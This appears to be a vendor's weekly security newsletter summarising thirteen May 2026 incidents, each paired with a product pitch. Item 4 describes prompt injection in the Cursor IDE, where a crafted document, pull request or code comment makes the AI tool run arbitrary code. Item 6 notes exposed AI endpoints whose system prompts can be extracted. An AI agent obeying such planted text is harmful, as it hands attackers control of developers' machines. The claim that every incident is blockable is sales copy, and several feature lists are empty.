Thirteen Incidents. One Pattern: The Perimeter Is Being Systematically Bypassed.

Researchers scanning the open internet found over one million exposed AI services โ€” model APIs, agent endpoints, and inference servers โ€” with no authentication, no rate limiting, and no governance. That number is the backdrop for everything else this week. Firewall vendors are shipping zero-days actively exploited before patches exist. Nation-states are using AI to write malware that passes the signature scanners protecting your pipelines. And a state-sponsored APT deployed ransomware not to extort, but to trigger your incident response while they quietly exfiltrated data in the background.

The pattern this week is unambiguous: controls built for a pre-AI threat model are being systematically bypassed. Behavioral, session-level detection is no longer optional โ€” it's the only class of control that survives these attacks.

Here's what happened, why it matters, and what RuntimeAI enforces against each class of threat.

Vulnerability

1 โ€” Palo Alto Networks: Firewall Zero-Day RCE Actively Exploited Before Patch

1 Palo Alto Networks PAN-OS โ€” Zero-Day RCE Actively Exploited CRITICAL ยท ZERO-DAY
SecurityWeek, BleepingComputer ยท May 6, 2026 ยท Network security ยท Enterprise perimeter

Palo Alto Networks disclosed an unpatched remote code execution vulnerability in PAN-OS โ€” the operating system powering their entire firewall product line. The flaw was being actively exploited in the wild before a patch was available, allowing attackers to pivot through perimeter controls into enterprise networks with no user interaction required.

A zero-day in a security product is an especially damaging category of incident because of the trust placed in it. Enterprises buy firewalls to be protected โ€” not to introduce additional attack surface. When the firewall OS itself is the vulnerability, every downstream security assumption built on top of that perimeter is invalidated until the patch ships.

The active exploitation before patch availability means every Palo Alto customer was running a known-vulnerable device with no remediation path. For enterprises with PAN-OS at their perimeter, the window between disclosure and patch deployment is a window of confirmed exposure.

Most Advanced AI Security How RuntimeAI Stops This

A compromised PAN-OS firewall gives an attacker network adjacency โ€” it doesn't give them your data or your AI workloads. RuntimeAI adds four independent layers that survive a full perimeter breach:

Perimeter controls assume the boundary holds. RuntimeAI assumes it doesn't โ€” and governs from the inside out with post-quantum encryption, cryptographic agent identity, and immutable audit.

Major Breach

2 โ€” Instructure Canvas: 275 Million Student Records Stolen, 9,000 Schools Hit

2 Canvas / Instructure โ€” ShinyHunters Steals 275M Records, Ransoms 9,000 Schools CRITICAL ยท MAJOR BREACH
CNN, TechCrunch, DataBreaches.net ยท May 7, 2026 ยท Education SaaS ยท 9,000 institutions worldwide

ShinyHunters compromised Instructure's Canvas LMS โ€” used by millions of students and teachers globally โ€” stealing 275 million user records including PII for students, teachers, and staff, plus billions of private messages. Approximately 9,000 school districts and universities are affected. Canvas went down during finals week. Instructure has until May 12 to pay or the data goes public.

A single SaaS platform compromise cascades across 9,000 institutions simultaneously. The attack surface isn't one organization โ€” it's the shared infrastructure layer every institution trusted. Education SaaS platforms hold years of behavioral and communications data that makes them high-value ransomware targets.

Most Advanced AI Security Zero Trust ยท Defence in Depth

When the SaaS platform you trust is compromised, the question is what an attacker finds inside your tenant. RuntimeAI ensures the answer is: very little they can use.

A SaaS platform breach is a supply chain attack. RuntimeAI's data-layer controls mean the blast radius stops at the tenant boundary, not at the perimeter.

Vulnerability

3 โ€” Windows Defender Zero-Day CVE-2026-33825: BlueHammer + RedSun Exploits in the Wild

3 Windows Defender Zero-Day CVE-2026-33825 โ€” Local Privilege Escalation on Fully Patched Systems HIGH ยท ZERO-DAY
Picus Security, NVD, CISA ยท May 7, 2026 ยท Endpoint security ยท Windows 10 / Windows 11

A zero-day in Microsoft Defender's threat remediation engine (CVE-2026-33825, CVSS 7.8) allows an unprivileged local user to escalate to SYSTEM on fully patched Windows 10 and 11. Two working exploit chains โ€” BlueHammer and RedSun โ€” are publicly available. CISA has separately added CVE-2026-32202 to its KEV catalog, ordering federal agencies to patch by May 12. The security tool designed to protect the endpoint is the vulnerability.

When the endpoint security product is the attack vector, every assumption built on it โ€” detection, alerting, remediation โ€” is invalidated. Privilege escalation to SYSTEM means full control of the endpoint regardless of what other controls are running on it.

Most Advanced AI Security How RuntimeAI Stops This

SYSTEM-level compromise of an endpoint is severe โ€” but it's not the end when AI workloads are governed independently of the host OS and endpoint security stack:

When the security tool is the attack vector, you need a security layer that doesn't depend on it. RuntimeAI's enforcement is orthogonal to the endpoint stack by design.

AI Security

4 โ€” Google Gemini CLI CVSS 10 RCE + Cursor IDE Arbitrary Code Execution

4 Gemini CLI โ€” CVSS 10.0 RCE in AI Developer Tooling CRITICAL ยท RCE
The Hacker News, SecurityWeek ยท May 5โ€“6, 2026 ยท AI developer tooling ยท CI/CD pipelines

A CVSS 10.0 remote code execution vulnerability in Google's Gemini CLI gave attackers arbitrary code execution across CI/CD pipelines that had the tool installed. Separately, Cursor IDE was found to expose arbitrary code execution via prompt injection โ€” an attacker could craft a document that, when opened in Cursor, executes arbitrary code on the developer's machine with no additional interaction.

Two AI developer tools shipping critical RCE vulnerabilities in the same week reflects the speed at which AI tooling is being shipped without the security review cycles applied to traditional software. These tools run with elevated permissions inside developer environments and CI/CD pipelines, making them exceptionally high-value targets.

The Cursor prompt injection vector is particularly significant: it means any document a developer opens in their AI-assisted IDE is a potential code execution vector. Malicious pull requests, poisoned documentation, and adversarial prompts in code comments all become delivery mechanisms.

Most Advanced AI Security Zero Trust, Layer by Layer

Both attacks exploit the elevated trust AI developer tooling holds inside CI/CD pipelines. RuntimeAI governs the full chain from tool registration to credential access:

AI developer tools run with more trust than almost any other process in your environment. RuntimeAI treats that trust as a risk surface and governs it with cryptographic identity, behavioral scope enforcement, and quantum-resistant credential storage.

5 โ€” Your AI Agents Are Already Inside the Perimeter

5 Enterprise AI Agent Inventory Gap โ€” No Baseline, No Governance HIGH ยท AGENT SECURITY
RuntimeAI Research, Gartner ยท May 2026 ยท Enterprise AI governance ยท All industries

A cross-industry analysis published this week found that enterprises are deploying AI agents faster than security teams can inventory them. The majority of enterprise AI deployments have no behavioral baseline, no governance policy, and no real-time monitoring. Most CISOs surveyed had no accurate count of what agents were running in their environment.

You cannot govern what you cannot see. The agent inventory gap is the foundational risk that makes every other incident in this digest worse โ€” when an AI agent is compromised, exfiltrating data, or operating outside its approved scope, there is no detection layer to catch it.

Agents operating in enterprise environments today have access to email, CRM data, financial systems, and code repositories. A single ungoverned agent with those permissions is a significant exfiltration vector โ€” and most enterprises have dozens or hundreds of them with no audit trail.

Most Advanced AI Security Why RuntimeAI Customers Are Protected

You cannot enforce what you have not inventoried. RuntimeAI solves the visibility gap first, then layers cryptographic governance and quantum-resistant data protection on top:

6 โ€” Researchers Scan 1 Million Exposed AI Services โ€” Results Are Worse Than Expected

6 1 Million+ Exposed AI Endpoints โ€” No Auth, No Rate Limit, No Audit Trail CRITICAL ยท EXPOSED SURFACE
Security Research / Shodan Analysis ยท May 2026 ยท AI infrastructure ยท Public internet

Security researchers published findings from a scan of over one million publicly exposed AI services โ€” model APIs, agent endpoints, and inference servers accessible on the open internet. The majority had no authentication, no rate limiting, and no audit trail. Any actor with internet access could query these models directly, extract their system prompts, abuse their tool-calling capabilities, or use them as free inference infrastructure for malicious purposes.

One million is not a rounding error โ€” it represents the scale at which AI infrastructure is being deployed without the security controls applied to any other category of internet-facing service. Researchers found production model APIs, agent orchestration layers, and enterprise inference gateways in the exposed set โ€” all accessible without credentials.

Most Advanced AI Security How RuntimeAI Stops This

An unauthenticated AI endpoint is an open door. RuntimeAI closes it at every layer โ€” from identity enforcement to post-quantum encryption of every credential and audit record:

The million exposed services researchers found this week exist because there's no enforcement layer between the internet and the model. RuntimeAI is that layer โ€” with post-quantum encryption and cryptographic identity built in from the ground up.

7 โ€” LiteLLM CVE-2026-42208 SQL Injection Exploited Within 36 Hours

7 LiteLLM โ€” SQL Injection CVE Exploited in the Wild Within 36 Hours of Disclosure CRITICAL ยท CVE EXPLOITATION
SecurityWeek, BleepingComputer ยท May 4, 2026 ยท AI infrastructure proxy ยท Enterprise LLM deployments

A SQL injection vulnerability in LiteLLM โ€” one of the most widely deployed AI infrastructure proxies in enterprise environments โ€” was actively exploited in the wild within 36 hours of public disclosure. Compromising the proxy gives attackers access to all downstream model interactions, stored API keys, and usage data across every application flowing through it.

The 36-hour exploitation window reflects a pattern seen increasingly with AI infrastructure CVEs: the attack community watches these disclosures in real time and has automated scanning for vulnerable instances. The enterprise patch deployment window is measured in days to weeks โ€” leaving a wide-open exploitation period.

Most Advanced AI Security Zero Trust ยท Defence in Depth

LiteLLM sits between your applications and your model providers โ€” a compromise there touches everything. RuntimeAI wraps that entire attack surface with independent monitoring and quantum-resistant credential storage:

8 โ€” AI Adoption Fuels Identity Attack Path Risk (SpecterOps Report)

8 AI Agents Expanding Identity Attack Paths โ€” SpecterOps Report HIGH ยท IDENTITY
SpecterOps ยท May 2026 ยท Identity security ยท Enterprise AI deployments

A new SpecterOps report found that enterprise AI adoption is dramatically expanding identity attack paths as agents are provisioned with broad permissions without corresponding governance frameworks. AI agents are being granted access to sensitive systems with permissions that would trigger review for a human employee but are approved automatically for agents.

Agents operate continuously, from infrastructure, at machine speed, with no behavioral baseline established before they're granted production access. The attack path an agent creates is invisible to tools designed for human identity governance.

Most Advanced AI Security Why RuntimeAI Customers Are Protected

Agent identity is the new attack path. RuntimeAI governs it at every layer โ€” from cryptographic identity issuance to quantum-resistant storage of the credentials that define what each agent can reach:

Supply Chain

9 โ€” DPRK Using AI to Generate Obfuscated npm Malware That Bypasses Scanners

9 DPRK AI-Generated npm Malware โ€” Evading Signature-Based Detection CRITICAL ยท NATION-STATE
The Hacker News, Mandiant ยท May 5, 2026 ยท Supply chain ยท npm ecosystem

North Korean threat actors were found using AI to generate obfuscated npm malware that bypasses automated signature-based security scanners. The AI-generated payloads are structurally different from hand-written equivalents, evading the pattern-matching rules that catch traditional supply chain malware. DPRK-linked packages were distributed via fake companies and fraudulent developer identities.

AI-generated malware changes the skill floor for nation-state supply chain attacks permanently. Writing obfuscated code that evades detection previously required significant expertise โ€” AI generation makes that capability available to any motivated actor and makes signature-based supply chain defense fundamentally insufficient.

Most Advanced AI Security How RuntimeAI Stops This

AI-generated obfuscation defeats signature scanners permanently. RuntimeAI governs on behavior, not signatures, and protects credentials with quantum-resistant encryption that makes stolen tokens useless:

10 โ€” DAEMON Tools Trojanized โ€” Government and Scientific Orgs Hit via Official Update Channel

10 DAEMON Tools Supply Chain Attack โ€” Trojanized Official Update Channel HIGH ยท SUPPLY CHAIN
BleepingComputer, The Register ยท May 3, 2026 ยท Supply chain ยท Disk utility / government sector

A trojanized version of DAEMON Tools was distributed via the software's official update channel, targeting government agencies and scientific research organizations. The malicious update appeared to originate from the legitimate vendor, bypassing organization-level allowlists and code-signing verification. DAEMON Tools developers subsequently confirmed the breach and released a malware-free version.

The official update channel attack exploits the trust relationship organizations are supposed to have with their vendors. An update that passes code signing, arrives from the vendor's own servers, and installs silently via the same mechanism as all previous updates is essentially invisible to traditional endpoint controls.

Most Advanced AI Security Zero Trust, Layer by Layer

Provenance-based trust โ€” "it came from the official channel, so it's safe" โ€” is the assumption this attack was designed to exploit. RuntimeAI removes that assumption with behavioral verification, post-quantum-signed provenance, and credential isolation:

Major Breach

11 โ€” MuddyWater Deploys Ransomware as a Decoy in Espionage Operations

11 MuddyWater (Iran) โ€” Chaos Ransomware as IR Distraction for Silent Exfiltration CRITICAL ยท APT ESPIONAGE
SecurityWeek, Mandiant ยท May 2026 ยท Nation-state APT ยท Critical infrastructure and government

Iranian APT MuddyWater deployed Chaos ransomware as a deliberate distraction โ€” not to extort, but to trigger victim incident response while simultaneously conducting silent data exfiltration on a separate track. By forcing the IR team to focus entirely on ransomware recovery, the attackers exfiltrated sensitive data undetected for the duration of the incident response operation.

Ransomware-as-decoy inverts the threat model most IR playbooks are built around. Your team's response to the ransomware โ€” containment, recovery, executive communications, vendor engagement โ€” becomes the attackers' cover. Every hour your IR team spends recovering encrypted files is an hour the exfiltration operates unobserved. Your playbook is their camouflage.

Most Advanced AI Security Zero Trust ยท Defence in Depth

The decoy-and-exfiltrate tactic works because most IR tools focus on one event at a time. RuntimeAI runs all tracks in parallel โ€” with independent audit, PQ-encrypted data protection, and pre-positioning detection that exposes the operation before the ransomware even deploys:

12 โ€” Ransomware Attacks Succeed Even When Backups Exist

12 Backup Destruction as Primary Ransomware Tactic HIGH ยท RANSOMWARE
The Record, Recorded Future ยท May 2026 ยท Ransomware ยท Cross-industry

An analysis of recent ransomware incidents found that attackers are systematically targeting and destroying backup infrastructure before triggering encryption โ€” rendering recovery impossible even for organizations that believed they had adequate backup coverage. The backup destruction phase now routinely precedes ransomware deployment by days or weeks of quiet pre-positioning.

Backup coverage is now a necessary but insufficient ransomware defense. The assumption that "we have backups" equals "we can recover" has been invalidated. Attackers with weeks of pre-positioning time can identify, access, and destroy backup infrastructure before the ransomware event makes them visible.

Most Advanced AI Security Zero Trust ยท Defence in Depth

Backup destruction works because defenders don't watch backup access the way they watch production access โ€” and because the audit trail usually lives in the same infrastructure the attacker is destroying. RuntimeAI solves both problems:

Vulnerability

13 โ€” WatchGuard Firebox Zero-Day Actively Exploited

13 WatchGuard Firebox โ€” Zero-Day Actively Exploited by Threat Actors HIGH ยท ZERO-DAY
Dark Reading ยท May 7, 2026 ยท Network security ยท Enterprise firewall deployments

Threat actors are actively exploiting a zero-day in WatchGuard Firebox devices โ€” the second major firewall zero-day this week after Palo Alto PAN-OS. The pattern is identical: a perimeter device trusted to protect everything downstream is itself the vulnerability. Organizations relying on Firebox as a primary network security control have no remediation path while exploitation is active.

Two firewall zero-days in a single week is not a coincidence โ€” it is a signal. Threat actors are systematically targeting the perimeter layer because a single perimeter compromise invalidates all downstream trust assumptions simultaneously. Defense-in-depth is not optional architecture.

Most Advanced AI Security Zero Trust ยท Defence in Depth

Same incident archetype as Palo Alto PAN-OS. Same RuntimeAI answer โ€” because the architecture doesn't change based on which perimeter device fails:

Two firewall zero-days in one week is a signal. RuntimeAI's architecture treats the perimeter as permanently unreliable โ€” post-quantum identity, encrypted transit, and immutable audit from the inside out.

The Pattern: Every Control in Your Stack Was Bypassed This Week

Thirteen incidents. Four categories. One throughline: every attack this week worked by going around or through the controls organizations have invested in.

๐Ÿ” What RuntimeAI Governs Across All Thirteen

Behavioral enforcement inside the perimeter ยท Agent discovery and inventory ยท AI endpoint authentication and rate limiting ยท Supply chain behavioral detection ยท Identity attack path governance ยท Dual-track audit logging during incidents ยท Backup access anomaly detection ยท Data exfiltration detection and egress control ยท Workload identity independent of host trust ยท Runtime enforcement โ€” not perimeter assumption.

Vulnerability AI Security Supply Chain Nation-State Zero-Day LLM Security Identity Weekly Digest

If your stack didn't stop these โ€” you need RuntimeAI.

Thirteen incidents. Every single one detectable and blockable at the RuntimeAI enforcement layer. See how runtime behavioral enforcement works across your environment.

Request a Demo โ†’

Or subscribe to get this digest every week: